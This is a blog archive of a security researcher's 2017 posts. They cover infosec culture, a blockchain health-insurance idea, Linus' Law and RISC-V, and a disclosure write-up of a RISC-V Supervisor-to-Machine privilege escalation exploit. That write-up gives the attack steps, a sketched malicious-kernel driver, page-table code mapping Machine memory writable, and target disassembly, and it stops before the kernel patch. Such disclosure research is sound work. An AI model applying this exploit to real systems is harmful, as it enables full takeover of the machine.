Monday, October 23, 2017

An Eulogy for Infosec

Sam's Funeral

Last night I watched one of the best episodes of television to ever grace the liquid crystal affixed to the center of my living room. The episode "Eulogy" from season two of Pamela Adlon and Louis C.K.'s "Better Things" absolutely floored me. If you aren't watching, I highly suggest the show. Season two is particularly exceptional, and not solely for "Eulogy". 

Warning: this blog post is basically a spoiler for the episode. 

In the episode, Pamela's character Sam Fox starts off by leading a class in acting. This scene is meant to highlight the fragility of acting as a profession due to the drudgery of wading through awful writing to simply taste the chance of performing a brilliantly written piece, while exemplifying the actor's duty to capture and reproduce human vulnerability almost seamlessly. The cool and breezy way Sam exposes her students' strengths as weaknesses is elegantly juxtaposed against her own assertiveness. 

In the following scene, the exceptional skills Sam has tuned over the years are almost tossed aside when the practical and logistical world of commercial acting imposes itself on her. Take after take, she's relegated to the role of side-lined wife to a man-child in a fast, red car. Her talent has little bearing on her value in this scene, which is a perfect parallel to many careers that require years of stringent training to perform what are essentially menial duties. 

The rest of the episode is a beautiful study of these first two scenes, through the eyes of Sam and her daughters. At home, Sam's daughters dismiss her career as uninteresting, something to submit a casual eye-roll toward. Interestingly, Sam breaks the rule she defined for her acting students in the first scene by being confident and assertive, challenging her daughters and demanding their respect for her hard work and success. The daughters dismiss her as childish and weak, driving her from the house. 



Skip to the final scene: Sam arrives back home to a surprise "funeral", where her daughters and friends eulogize her in order to tell her - albeit pseudo-indirectly - how much they do love and respect her. Sam (Pamela?) completely breaks down in perhaps one of the most sincere, vulnerable scenes I've ever watched, as she fulfills the promise set forth in scene one. 

Phenomenally written by Louis and heartbreakingly acted by Pamela, the episode actually brought tears to my eyes, for so many personal reasons. However, it also struck me as fascinating because professionally we suffer the same fate in so many careers, but especially information security. Why? Because we've been killing our industry for years. 

The Death of an Industry

At 44con this past September, I described why Information Security as an industry is dying. Don't believe me? You're not paying attention. Hacking, as an art, is dying. Our industry has been screaming at engineers and developers for decades without any attentiveness whatsoever. Yet, over the past ~5 years, they're finally starting to listen. This is primarily thanks to major corporations like Google, Apple, and Microsoft backing information security as a necessity. Google Project Zero, Microsoft BlueHat and their many other initiatives, and the exceptional team at Apple Product Security have all pushed the limits of what can be accomplished in offense. The result? A far stronger baseline for defense than we've ever seen in the history of computing. 

Today, it's almost impossible for an average hacker to develop a zero-day exploit for any given target. In the late '90s and early aughts, zero-days for BIND, sendmail, and even SSH were floating from secret-hacker-cult to secret-hacker-cult without the commercial world being any the wiser. The cost of developing and deploying such technology today is so high that only a handful of people can do it, when it can even be done. 



We're also finding flaws faster than ever before. I wouldn't presume this is because there are "more" experts in the industry than ever before. That's quite flawed logic. Rather, it's because the tools are more cost effective and more available than ever before. Skilled hackers are still in the 1% of our industry, but they have better equipment than ever thanks to open source software and improvements in high-level programming languages. 

Point being? They're finally listening. Companies are hiring hackers at record speed. They're building security teams. They're building Secure Software Development programs. They're absorbing us. 

The result? We are no longer unique. We are becoming integrated.

Better Things

But the real question that the episode "Eulogy" brought to mind was, are we respected? For all the effort we put in to coerce companies to integrate security into their process, are we heard? Are our efforts changing anything for the better?

No. 

While we perceive the baseline of security to be significantly elevated (and it has elevated), it has also shifted. We are essentially Sisyphus, except every boulder we focus on pushing uphill leaves another boulder to fall. While smartphone security has improved, laptop endpoint security has declined. IoT security is practically non-existent, even as cloud security remains fairly resilient. 



The baseline elevates based on our voice. And our voice is psychotic. Our industry spends more energy confusing executives and end users than it spends successfully solving problems. We plead for engineers to listen to us, yet refuse to engage in reasonable discourse on what is cost-effective and practical, focusing instead on what mysterious and ethereal subtle flaws may or may not exist in hardware Trusted Platform Modules. 

Let me clarify something for you. The world is like Sam Fox's daughters. They just don't give a fuck what you think. They love you when you care for them. They love you because you care for them. But they don't want to hear your whining fucking voices. They want you to fix things. And we're not fixing things. If anything, we're scattering the problem through our pettiness and flippant behavior. 

We need to spend less time spouting the infosec equivalent of Trump-isms over 140-character communication channels and more time making Better Things. Change happens when we stop posturing. When we stop trying to be cool. When we sit down, communicate our thoughts in a healthy manner, and listen to each other. Change happens in spite of ourselves. Change happens when we show the world what real problems are, instead of what our agenda dictates. 

So shut the fuck up. Put your phone down. And make something better.

And to quote Diedrich Bader's character in the episode, don't engage me if you don't want to know how I actually feel about your thoughts and behaviors. 

Your Friend,
Don A. Bailey
CEO / Founder
Lab Mouse Security

Friday, May 5, 2017

Open Source Healthcare

No Matter What Side You're On, Admit It: You're Sick

Earlier today I became quite frustrated with the state of our social discussion on insurance, ACA, AHCA, and politics in general. Every day we read more articles, tweets, and social media posts that describe why Trumpcare, a.k.a. AHCA, is awful. On the flip side of the coin, many supporters are praising AHCA for the decreases they will see in their upcoming bills. 

I'm not here to debate the essence of AHCA. I am here to tell you that American insurance, as a whole, is an opaque black box of controversial billing classifications, executive hierarchies, and political influence. Regardless of whether you are for AHCA or against it, we all lose in the end through the use of American insurance programs. Why? Insurance companies function as (surprise!) corporations! 

Their first priority is profit, not benefiting the American people. And frankly that's fine. It's okay for a corporation to serve the community and profit. That's precisely what capitalism is all about! It's about the choice to use a service that helps you at your own cost. The problem in the United States of America isn't that we have for-profit corporations selling us health services, it's that this is our only reasonable model to acquire health assistance. 

To reinforce this concept of for-profit operation for those who might presume these companies are doing the best they can to help us, let's take a look at some financial records, shall we?

Anthem

Anthem's CEO, Joseph R. Swedish, was compensated well in 2016 with a total of 16,455,697 USD. The previous year was gang-busters for Joe as well, with just over 13 million USD in total compensation. This is only up around 100k from his previous year as Anthem chair. You can read the report here on the SEC website.

Cigna

The CEO of Cigna, David M. Cordani, pulled in a total compensation package worth over 15 million dollars in 2016. This is actually down from over 17 million USD in 2015. View the SEC filings here.

Aetna

Mark T. Bertolini, CEO of Aetna, raked in an excellent compensation package in 2016 worth over 18.6 million USD. This is an increase of over 3.5 million over his 2015 compensation package. Read the SEC filings here.

So Corporations Make Money, So What?

Yes, corporations are designed to make money. That's totally fine. I'm actually for this practice. I love capitalism and I love the U.S.A.! I even respect these men for climbing their respective ladders and joining the ranks of well-compensated executives that are working hard for their corporations. This is not a bad thing.

What is a bad thing is the way America's policies force us to choose programs that funnel into corporate interests with no alternative. This has resulted in major social volatility across every political and socioeconomic group. People on every side are angry, scared, and exhausted by the non-stop in-fighting, vicious hyperbole, and unabashed profiteering. 

Americans need a new choice, and they need it now. Not in ~3 years when AHCA's flaws bankrupt families. Not in ~3 years when entire groups of persons afflicted with "pre-existing conditions" are forced to funnel their hard-earned cash into insurance company pockets rather than back into a diverse marketplace. If someone takes the initiative today, it may actually be a viable alternative in 3 years when AHCA kicks in, if it passes the Senate. 

"So what the hell is your point, Don? Get on with it."

The Issues As I See Them

As I see it, the major issues with modern health insurance are as follows. Granted, I am a novice at this and most of this is based on empirical observations, so part of this blog post is a call to action for those who are more in the know than I am:
  • We pay high premiums
  • We have no idea how this money is appropriated
  • Individuals that need assistance are denied for absurd, often political/religious/etc reasons
  • People without adequate health care will die without adequate assistance
  • People are already dying and already going bankrupt because of American healthcare
  • Insurance companies run on massively outdated and inefficient human and computing infrastructures
Now I'm no fool. I don't think we can save the world. All I know is we can solve a few of the above issues. 
  1. Our money doesn't have to fund high executive salaries
  2. Our money doesn't have to fund absurd, archaic, over-engineered supporting infrastructure
  3. Our money doesn't have to be funneled into a black box for which we have no oversight and no right to influence, despite paying for it to exist
Our money can help people.

Salaries

Now this requires a bit of imagination, but picture an American health care system that didn't require executive salaries. We've learned in the sections above that executive compensation can tier out around 15 million per year. Let's guesstimate that, across the top 25 health insurance companies, an average compensation package for a CEO is around 10 million. We can extrapolate this from SEC filings for a few, then presume that the industry self-regulates and requires these companies to dole out similar packages to incentivize talented CEOs. Next, let's extrapolate an average non-CEO high-level executive compensation package at around 5 million per year, and presume that each of these companies has 3 highly paid executives at that level. 

So, total that all up as: (25 * 10,000,000) + (25 * 3 * 5,000,000) = 250,000,000 + 375,000,000 = 625,000,000

The total amount of money we could recoup from eliminating high executive compensation is literally over half a billion dollars per year. And that's just a reasonable estimate. In capitalist societies, we are supposed to be offered the option to pay for services, or alternatives that better suit us. Why are we choosing to pay for someone else to amass a fortune when our friends and neighbors are choosing medicine over food? 

This number might not seem like a large amount when you juxtapose it against the various billions of dollars being strewn about in the news lately, but given the number of people using GoFundMe just to raise 10,000 USD for their family medical bills, this could at the least help ~62,500 families. That sounds like a good thing, right?
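
If you want to sanity-check the arithmetic, here is a minimal sketch of the estimate above in plain C. Every figure in it is the same guess used in the prose, not a number taken from any filing.

    #include <stdio.h>

    int main(void)
    {
        /* Back-of-the-envelope assumptions from the estimate above; these are
         * guesses for illustration, not figures from SEC filings. */
        const double companies         = 25;        /* top health insurers      */
        const double ceo_package       = 10000000;  /* avg CEO compensation     */
        const double execs_per_company = 3;         /* other highly paid execs  */
        const double exec_package      = 5000000;   /* avg non-CEO exec package */
        const double gofundme_goal     = 10000;     /* typical family campaign  */

        double recouped = (companies * ceo_package)
                        + (companies * execs_per_company * exec_package);

        printf("recouped per year: %.0f\n", recouped);                  /* 625,000,000 */
        printf("families helped:   %.0f\n", recouped / gofundme_goal);  /* 62,500      */
        return 0;
    }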

Supporting Infrastructure

The dollars we stuff monthly into the insurance infrastructure are further distributed into a massive network of workers who have absolutely nothing to do with the actual medical professions imperative to the healthcare industry. Instead, their sole purpose is to log data, inspect databases, set up IT infrastructure, review coding practices, evaluate billing forms, input billing data, convert billing data, and the list goes on and on and on...

While many of these jobs are important and do ensure that the insurance machine itself works, it is the engineering of this machine that has failed us. Instead of designing a sleek, streamlined machine that performs one specific task - and performs it well - we've designed a contorted monstrosity that requires inefficient and mundane roles to maintain its cracking and withering facade. Without these jobs, the insurance industry would implode from the weight of its own inefficiency. 

The larger problem is that these jobs are extremely hard to quantify. It isn't easy to identify the number of these roles, the salary compensation for these roles, or how tightly integrated their roles even are with the company (or companies) they support. Because of this, we can't jump to conclusions about the total dollars allocated to this space. All we know for sure is that it's a vortex in which money simply disappears. While I would love to wildly speculate that this portion of the insurance industry is the likely cause of billions of dollars in misappropriation, it would be a disservice to do so. All I can say for sure is that we are indeed wasting, at the least, millions of dollars per month on trivial tasks that could be done through modern automation. 

No Visibility

And that brings us to the last point: we have no visibility into how insurance companies are run, how they invest our money, or how they allocate funds to end users. There is no ability for the public to identify patterns of misappropriation. There is no ability for the public to identify millions of dollars that are misspent, that could have saved lives. There is no ability for the public, who pays into these massive "public" funds, to vote on or evaluate how the money should be distributed. 

This, in my opinion, is the most damning red flag of all. We the people are legally forced to funnel money into a system that literally decides whether we live or die, yet we have less visibility into the inner workings of this system than we have into the political decisions made on The Hill. That lack of transparency is a national disgrace, and one that must be rectified. We literally pay for this creature to exist, this Frankenmonster of life support, yet we are denied the schematics out of a lack of privilege. 


Yeah, Yeah... I Hate Blockchain, Too; But...

One way to solve the three problems described above is with technology. One technology comes to mind: the Blockchain. While I am not a fan of Bitcoin as a whole, Blockchain technology has several major benefits that I'll focus on here: transparency, security, and traceability. 

Security

First and foremost, the Blockchain was designed brilliantly, and is the most fascinating aspect of Bitcoin technology. Each transaction made in the Bitcoin network (or any Blockchain-based network) is securely written into the Blockchain ledger. While there are infrastructure security concerns with Bitcoin (and similar coin technologies), the Blockchain can indeed be used to guard against fraud, even at scale. 

In fact, IBM is heavily invested in using Blockchain technology for almost everything, from financial services, to asset tracking, and even IoT. We at Lab Mouse Security have integrated Blockchain technology into our IoT Security Platform, to be released later this month (though we have zero plans to use it for medical or medical insurance purposes). Blockchain technology is no longer a toy, it is becoming a mainstream technology that can be used to secure some of the most critical transactions in commerce. 

Traceability

The Bitcoin Blockchain was designed to ensure that every transaction made in the system can be traced. The exact time the transaction was made, which party was the source, which party was the destination, the cost of the transaction, all of this data is stored globally. Everyone has access to it. 

If health care providers used this technology for insurance purposes, we could easily see that a health care provider (say, a hospital) received a payment from N sources. We could even encode transaction details that identify the related case number associated with each transaction, so analysts understand who benefited from it. 
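
Purely as an illustration of what such a record might carry, here is a hypothetical ledger entry sketched in C. Every field name is my own assumption; none of this comes from Bitcoin, Careful, or any existing insurance format.

    #include <stdint.h>

    /* Hypothetical entry in a public healthcare payment ledger. The point is
     * only to show that "who paid whom, for which case" can be encoded and
     * chained publicly without exposing patient details. */
    struct claim_transaction {
        uint64_t timestamp;      /* when the payment cleared                        */
        uint8_t  payer_id[32];   /* hash identifying the insurer or funding pool    */
        uint8_t  payee_id[32];   /* hash identifying the provider (e.g. a hospital) */
        uint64_t amount_cents;   /* payment amount                                   */
        uint8_t  case_ref[32];   /* hash of the related case number, so analysts can
                                    trace who benefited without reading the case     */
        uint8_t  prev_tx[32];    /* hash of the previous entry, chaining the ledger  */
    };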

This means that the insurance company is no longer a black box that slices away at each penny as quietly as it can. Each slice is loudly documented in the ledger for everyone to see. It would be possible to have almost absolute governance over the behavior of not only insurance companies, but their relationships to providers, and their relationships to individuals.

Transparency

This brings us to transparency. Every relationship and transaction becomes public in the global ledger. This would allow The People to identify fund misappropriation, and even point out special treatment. Organizations that attempt to funnel money to specific providers in a suspicious or unethical way would be uncovered. Companies that inefficiently or unethically appropriate funds would not be able to hide their actions from the public ledger. 

Introducing Careful

When put together, these features enable a completely different type of insurance company, one that no longer needs many of the technologies required to drive the antiquated behemoths we've grown to loathe. We can reduce corporate overhead by streamlining processes that are outdated and inefficient, and by automating the repetitive, largely unnecessary roles that currently sustain them. 

We can make better decisions when the data is transparent. If all information about how insurance companies behave is open, there is less misappropriation, favoritism, and inefficient spending. 

We can act faster when someone is in need. By making the financial network that supports end-users open and transparent, we can quickly evaluate where pools of money are idle, and whether that money can be redirected to someone who needs it immediately. We can also identify which parties are best suited for a particular transaction, giving the end-user more choice as to what insurance organization and what healthcare provider is involved in their actual care. 

We can reduce the absurd costs of doing business, such as high-priced executive pay in an industry where many lives are lost for the cost of these compensation packages. 

I'd like to introduce the concept of http://careful.is/. This is just an idea, but it is an idea that could save lives. Blockchain is just a technology. For Open Source Healthcare to work, it must be driven by intelligent, experienced individuals that are willing to offer their perspectives for free, for the purposes of creating a system (or even the concepts for a system) that will benefit all people. It should be driven by individuals who want to use technology to uplift and save lives, not profit on investment opportunities. 

Getting Realistic

When Linux started, it was simply a few lines of code, and an angry idea that users had a right to control their hardware for free. While Careful probably isn't the Linux of health care, with the right minds working together it can influence the next group of people that do want to be the Linux of healthcare. 

If you would like to get involved, please reach out to me through Lab Mouse's contact page. Help document what insurance companies do. How do they work? How do they waste funds? How can they be more efficient? How can healthcare be improved by transparent and free technologies? What does it cost to run and maintain such technologies? How would users pay into the system? How would they take money out? How would fraud be combated? How would administration of the ecosystem work without compensation packages? How could transparency be maintained at low cost? 

While these questions seem almost impossible when posed here, and in all honesty we may never get real answers (the insurance companies are monoliths for a reason), if we don't try, we'll never find a path to a realistic alternative. If anything, this data could be used to improve existing insurance company processes, reducing waste and improving allocation to end users. A licensing model that disallows the use of recouped funds for compensation packages and the like could be drafted, allowing the exchange of information without it being used against the will of Careful. 

Regardless, it would be exciting to disrupt the insurance world. Wouldn't it? :-)

Faithfully,
Don A. Bailey
Founder and CEO
Lab Mouse Security

Saturday, April 29, 2017

The RISC-V Files: On Princeton MCM and Linus' Law

Princeton and RISC-V MCM

In the past week, a research team from Princeton's school of engineering released details on flaws they uncovered in the RISC-V memory consistency model (MCM). This is exciting work from Professor Margaret Martonosi and her team, because it demonstrates the value of using automation to uncover design flaws in complex systems. 

This strategy may be similar to the techniques used by commercial tools, such as Tortuga Logic's silicon security analysis utilities. Regardless, advances in capability from both commercial and academic teams have dramatically improved the state of the art over recent years. As a result, these bugs are being uncovered faster, and earlier in the engineering (or ratification) process, than ever before. 


Codasip and Linus' Law

To comment on Martonosi's findings, the Codasip team released a blog post describing their thoughts in the context of long-term RISC-V reliability and security. While I typically agree with the Codasip team, and have a large amount of respect for their engineering staff, I thought it imperative to comment on one aspect of their article: complex security landscapes are not made shallow when more eyes are focused on them. 

This concept, colloquially known as Linus' Law, posits that all flaws in complex (and open) systems are increasingly easy to observe, detect, and resolve as the number of users and engineers of that system increases. While this model does work for quality assurance (stability) purposes, it does not work well for subtleties that impact the security of complex systems. 

While there are many reasons why this mantra fails with respect to security models, I'll focus on one example for the purposes of this blog post: Linus' Law largely implies that bugs will reveal themselves.


Security is Not Stability

Linus' Law presumes one of two things will occur to diminish the total number of bugs in a complex system:
  1. Many engineers hunt for flaws in source code
  2. A subset of N users out of T total users will observe and report any given bug
While there are hundreds of engineers working on the Linux code base, they are often constrained within the technology they are focused on improving or implementing. Though these engineers can identify problems within their own ecosystem, they are largely focused on the source code of their implementation, not the resultant object code or machine code generated to run their source code, or the effects their code will have (and vice-versa) on multiple aspects of a running system. This level of visibility into a complex architecture is extremely challenging to acquire, and even more challenging to maintain.

This is why, while many engineers submit patches to the Linux kernel, only a handful of engineers are authorized to actually approve code for inclusion into each branch of the kernel. Put simply, only a few individuals are capable of observing complex security flaws, and these individuals are largely bogged down by engineering tasks that do not include the overarching analysis of subtle behaviors in the context of security. 

Yet, this point describes bugs that can be found easily prior to inclusion into the release of a kernel version. But, what happens when a bug does get through these checks and balances and ends up in the wild? This is where the many users part of Linus' Law comes into play. Someone, somewhere, out in production, will observe anomalous behavior. Hopefully, this user (or users) will also report this issue to the kernel team, or their distribution maintainers. It's fine to presume this will occur, but this will likely only occur if the bug is actually triggered by the user. 

In the case of complex security flaws, they are almost never triggered in the wild by accident. Exploiting a complex security flaw usually only occurs with intent, not arbitrarily. If one piece of a complex set of bugs leading to a critical gap in system security is triggered accidentally, it may never be observed as a flaw impacting security unless a specific chain of flaws is triggered all at once, and in a particular order. This is highly improbable in the real world, and results in a lot of simple bugs either being ignored as irrelevant, or resolved in the context of stability and not flagged as security related, which affects who applies the patch and how quickly.

This is why applications like Ubuntu's whoopsie are imperative, to ensure that even the simplest bugs are not ignored. But, it also requires the team reviewing whoopsie bug/crash reports to be capable of evaluating the risk of each flaw, then properly escalating the issue to someone with authority. So, there are still gaps even with this practice in place. 

Thus, as we can see, Linus' Law works well to ensure the stability of complex systems, but it is very inefficient at identifying and guarding users against security flaws. 


That Lonesome Road

The real resolution to complex security-related issues is creating a team to perform a unified analysis of each technology used in a system, and the overarching interactions between the technologies that make up the whole system. Using this model, fewer long-term flaws can make their way into system releases, and the ones that do are more likely to be simple bugs that can be detected using the presumptions in Linus' Law. 

In addition, tools like Professor Martonosi's team's technology, and commercial tools like Tortuga Logic's silicon security utilities, can greatly assist an internal security team, streamlining their workload and reducing errors by optimizing their time. 

This path, however, requires a long-term commitment to security, and an understanding that security is not a separate discipline from engineering, but is an effect of engineering stable systems. This is because a stable system is one that enforces rigid constraints around how data is accessed, stored, and processed. Insecure systems create arbitrary paths around these constraints, reducing the integrity of a system. Thus, any system with reduced integrity cannot be considered a stable system.

Though it comes at a cost, the positive effects of implementing a security program are long lasting for both manufacturers and consumers, ensuring greater stability and system integrity for not only end-users, but for the global Internet. 

For more information on architectural security analysis, please reach out to Lab Mouse Security. We specialize in architectural security for embedded systems, from wearable IoT, to Industrial IoT, and more! 

Don A. Bailey
Founder and CEO
Lab Mouse Security

Tuesday, April 18, 2017

The RISC-V Files: Supervisor -> Machine Privilege Escalation Exploit

The Demo

The following video demonstrates my original proof-of-concept exploit for the RISC-V privilege escalation logic flaw in the 1.9.1 version of the standard. The exploit lives in a patched Linux kernel, controlled through a simple userland application. The Linux kernel triggers the exploit and breaks out of Supervisor privilege in order to abuse the Machine level privilege. You may need to play the video in full-screen mode to view the console text. 


In the video, the userland application fakesyscall is used to control the exploit living in the Linux kernel. The first option passed to the app (and subsequently to the kernel) is 6. Option 6 simply tells the kernel to dump bytes of memory at a specific address in RAM. Option 8 then overwrites this same memory region with illegal opcodes. Option 6 is used again to verify that the opcodes have been overwritten. 

Finally, option 9 is used to tell the malicious kernel to trigger a call from its privilege layer (Supervisor) to Machine mode, which executes the overwritten instructions. This causes an unhandled exception in QEMU, which is displayed at the bottom of the screen at the end of the video ("unhandlable trap 2"). Trap 2 represents the illegal instruction trap, which is not supported in the Machine layer of this implementation (qemu-system-riscv64 and riscv-pk). 
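
For readers who want a feel for the control flow, below is a minimal sketch of what a fakesyscall-style driver program might look like. The syscall number and the exact argument layout are my assumptions; the only details taken from this post are the option values (6 = dump, 8 = overwrite, 9 = trigger) and the kernel patch's use of a1 through a4 for the option, physical address, length, and user buffer (see the patch later in this post).

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    /* Hypothetical: whichever existing system call was augmented in the
     * patched kernel. The real number is not given in this post. */
    #define SYS_fakehook 278

    static long fakehook(long opt, long pa, long len, void *buf)
    {
        /* The first argument is unused here; the patched handler keys off of
         * a1 (opt), a2 (physical address), a3 (length), and a4 (buffer). */
        return syscall(SYS_fakehook, 0L, opt, pa, len, buf);
    }

    int main(int argc, char **argv)
    {
        unsigned char payload[32];
        long pa = 0x80000dfcL;   /* MCALL_SHUTDOWN code in this riscv-pk build */

        if (argc < 2) {
            fprintf(stderr, "usage: %s <option>\n", argv[0]);
            return 1;
        }

        switch (atoi(argv[1])) {
        case 6:  /* dump bytes of Machine-layer memory at pa */
            return (int)fakehook(6, pa, sizeof(payload), NULL);
        case 8:  /* overwrite pa; all-zero words decode as illegal opcodes */
            memset(payload, 0, sizeof(payload));
            return (int)fakehook(8, pa, sizeof(payload), payload);
        case 9:  /* trap to Machine mode and execute whatever now lives at pa */
            return (int)fakehook(9, 0, 0, NULL);
        }
        return 1;
    }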

A Brief Introduction to RISC-V Privilege

The RISC-V privilege model was initially designed as an ecosystem that consists of four separate layers of privilege: User, Supervisor, Hypervisor, and Machine. The User privilege layer is, of course, the least privileged layer, where common applications are executed. Supervisor is the privilege layer where the operating system kernel (such as Linux, Mach, or Amoeba) lives. The Hypervisor layer was intended to be the layer at which control subsystems for virtualization would live, but has been deprecated in more recent versions of the privilege specification. The Machine layer is the highest privileged layer in RISC-V, and has access to all resources in the system at all times. 


Full compromise of a system with a RISC-V core can't simply mean compromise of both the User and Supervisor privilege layers, which is the goal of most modern attacks. Rather, breaking out of the Supervisor layer into the Machine layer is required. This is because of the capability that the Machine layer will have in the future. 

The Hypervisor layer (H-Mode) was removed in the 1.10 privilege specification. The intent is that it may be re-added in a future revision of the privilege specification. Alternatively, it could be folded into the Machine layer. Regardless, both layers are designed to control processor functionality that the Supervisor layer cannot access. This includes physical memory regions assigned to other hypervisor guests, restricted peripherals, Hypervisor and Machine registers, and other high-privileged objects. 

In the future, Machine mode may also be used as a subsystem similar to TrustZone or Intel SMM. Trusted keys may be used here to validate executable code running in the Hypervisor or Supervisor layer. It may also support Supervisor's verification of User layer applications. Other critical security goals can be achieved by leveraging the isolation and omnipotence of the Machine layer. Such functionality may be able to detect and disable a Supervisor layer exploit. Thus, escalating privileges from Supervisor layer to Machine layer as quickly as possible is imperative for future-proofing RISC-V exploits.

Resolving the Risk

Before we get into the technical details, it is important to note that the RISC-V team is aware of this privilege escalation problem. I presumed this when I discovered this vulnerability, as anyone with a background in operating system theory or CPU memory models will quickly observe the gap in security caused by the 1.9.1 privilege specification's memory definition. More on that later. 



Regardless, I was unable to find material supporting that the team knew of this security gap and, in my excitement, did not realize that a resolution to this issue was proposed 15 days prior to my HITB talk. Stefan O'Rear emailed me privately and pointed out the git commit for the proposal, which explained why I was unable to find it (I was using poor search terms in my haste). 

The proposal (for PMP: Physical Memory Protection) can be found here on GitHub. In his email to me, Stefan points out that the image QEMU (and Bellard's riscvemu) executes, which contains the bootloader and the embedded Linux kernel/rootfs images, isn't designed for full Machine layer protection, and that it may not be updated with the PMP model in the near future. 

This is a reasonable perspective, but, academically, the exploit is still an important demonstration of flaws in CPU security logic. The target, itself, doesn't have to be an attempt at a perfectly secure system. It is more important that the exploit be proven practical and useful as an exercise. 

Besides, this was the first CPU-level security implementation flaw I've ever discovered of my own accord. So, I had extra incentive to actually exploit it. ;-)

But PMP Existed!

Correct! For those familiar, there was a PMP definition in the v1.9.1 privilege specification of RISC-V. However, this implementation was considered incomplete and not capable of deployment. This is probably why the qemu-system-riscv* emulators don't support it currently. As the git commit declares, the full PMP proposal was only introduced a couple of weeks prior to this post. 

The Vulnerability

The technical vulnerability is actually quite simple, especially if the reader is familiar with common CPU models for memory protection. Each privilege layer is presumed to be isolated from all lower privileged layers during code execution, as one would expect. The CPU itself ensures that registers attributed to a specific privilege layer cannot be accessed from a less privileged layer. Thus, as a policy, Supervisor layer code can never access Machine layer registers. This segmentation helps guarantee that the state of each layer cannot be altered by lower privileged layers. 

However, the original privilege specification defined memory protection in two separate places. First, the mstatus register's VM field defines what memory protection model shall be used during code execution. This can be found in section 3.1.8 of privilege specification v1.9.1. Table 3.3 in that same section outlines the various memory protection/translation schemes currently defined by the RISC-V team. 

The second place where memory protection is defined isn't in the Machine layer at all, it's in the Supervisor layer. This is where things get tricky. Because the Supervisor layer is where a traditional Operating System kernel would execute, it must be able to alter page tables to support dynamic execution of kernel code and userland applications. Thus, the sptbr (Supervisor Page-Table Base Register), found in section 4.1.10, allows the Supervisor layer to control read and write access to the page tables. 


For those that are unfamiliar, page tables control translation of virtual memory addresses (va) to physical memory addresses (pa). Page tables also enforce access privileges for each page, e.g. whether the page is Read-Only, Write-Only, Executable, etc. 

Because the Machine layer of privilege's executable code resides in physical memory, and the Supervisor layer can create page tables that can access that physical memory, the Machine layer cannot protect itself from the Supervisor layer. 

The attack works this way:
  • A malicious Supervisor kernel determines the physical address of Machine layer code
  • The kernel creates a page table entry that grants itself read/write access to the Machine layer
  • The kernel overwrites Machine layer code with a beneficial implant
  • The kernel triggers a trap to Machine mode, causing the implant to be executed with Machine privileges
It's quite simple! 
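
To make the second step of the attack concrete, here is a rough sketch of the leaf page-table entry a malicious Supervisor could hand the MMU. The helper is mine, not code from Linux or riscv-pk, and the flag bit positions assume the Sv39 layout from the current privilege specification; the essential point is that nothing in the translation scheme marks a physical page as belonging to the Machine layer.

    #include <stdint.h>

    /* Sv39 leaf PTE flag bits (positions per the current privilege spec). */
    #define PTE_V (1UL << 0)   /* valid    */
    #define PTE_R (1UL << 1)   /* readable */
    #define PTE_W (1UL << 2)   /* writable */
    #define PTE_A (1UL << 6)   /* accessed */
    #define PTE_D (1UL << 7)   /* dirty    */

    /* Map one 4 KiB page of Machine-layer physical memory read/write for the
     * Supervisor. The physical page number simply points at Machine code;
     * the page-table walk has no notion of "Machine-only" memory. */
    static uint64_t machine_page_pte(uint64_t machine_pa)
    {
        uint64_t ppn = machine_pa >> 12;   /* drop the 4 KiB page offset */
        return (ppn << 10) | PTE_D | PTE_A | PTE_W | PTE_R | PTE_V;
    }

In the actual exploit below, the same effect is achieved from inside the patched kernel with ioremap, which builds an equivalent Supervisor-visible mapping of the target physical page on the kernel's behalf.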

The Exploit

The fun part about this vulnerability was not so much discovering it, but writing a useful exploit rather than simply a proof-of-concept that demonstrated code execution. At HITB2017AMS this past week, I used a simple PoC to show that implanted code was indeed executing in Machine mode. However, this is quite boring and has no real value beyond proving the vulnerability. 

A real exploit needs to allow code injection in a way that any arbitrary payload can be implanted and executed within the Machine context, from Supervisor context. To accomplish this, it was necessary to do the following:
  • Identify Machine layer code that the Supervisor can trigger at will
  • Identify an unused or little-used function in that code that can be altered without negative consequence
  • Ensure arbitrary payloads can be stored within this region  


Triggering Machine Layer Code

This is the simplest part of the process. Currently, booting a RISC-V system means using the Proxy Kernel (riscv-pk) as a bootloader. This code lives in the Machine layer and loads an embedded kernel (such as Linux or FreeBSD) into virtual memory. 

The riscv-pk must support the embedded kernel by providing resources, such as access to the console device and information about the RISC-V CPU core the kernel is running on, and by performing other duties usually handled by mask ROM or flash. riscv-pk does this through the ecall instruction, the common instruction used to call the next most privileged layer in the processor. For example, an ecall executed at the User layer will likely be handled at the Supervisor layer. An ecall executed at the Supervisor layer will be handled by the Machine layer. (This is a simplistic explanation that can get more complex with trap redirection, but we won't dive into those waters at this moment.) 

So, when the Supervisor (Linux kernel) executes ecall, the Machine layer's trap handler is executed in Machine mode. The code can be found in riscv-pk at trap 9, the mcall_trap function, in machine/mtrap.c.

Unused Functionality

Most of the functionality in mcall_trap must be preserved, to ensure the stability of the system. Overwriting arbitrary instructions here is frowned upon from an exploit developer perspective. Instead, we must target specific functionality to disturb as little of the ecosystem as possible. Fortunately, we can do so with the MCALL_SHUTDOWN feature. 

This feature does precisely what it sounds like: it performs an immediate system shutdown, as if someone hit an ACPI power-off button on a PC. Presumably, we would never want to do this in a system we've compromised. We want the system live so we can control it! Thus, this is the feature to overwrite. However, only a few instructions can be overwritten here, as the functionality is small. Take a look at the assembly generated by this feature:

    80000dfc:   00008417                auipc   s0,0x8
    80000e00:   20440413                addi    s0,s0,516 # 80009000 <tohost>
    80000e04:   00100793                li      a5,1
    80000e08:   00f43023                sd      a5,0(s0)
    80000e0c:   00f43023                sd      a5,0(s0)
    80000e10:   ff9ff06f                j       80000e08 <mcall_trap+0x18c>

This only gives us 6 instructions to overwrite. Not much capability can be squeezed in here! So, instead, we use these few instructions to call out to another region of memory that can't be executed directly, reaching it by forcing a trap to mcall_trap.

We can be a bit clever and overwrite the code that bootstraps the Proxy Kernel, do_reset. This function has zero value for an already running environment! So, why not reclaim the executable space? When reading the objdump of the current riscv-pk, we can see that 60 32-bit instructions (or 120 16-bit compressed instructions) can be stored here. If we simply jump to the do_reset address and perform our real work there, we can get away with quite a bit, especially if we can constantly update this region of memory with any payload we choose. 

Arbitrary Payloads 

Storing arbitrary payloads in this region simply means designing a sufficiently engineered implant stager in our patched malicious Linux (or other) kernel. This feature simply loads the physical memory address at which an implant should live, and installs the implant. Easy! There's not much to it. The only catch is ensuring our jump instructions know the target physical memory address (and can reach that address using a single instruction). 

Linux Kernel Patch

The change to the Linux kernel is simple. We simply alter a system call to perform the implant installation and mtrap trigger. This can be done by augmenting any system call with two chunks of code:


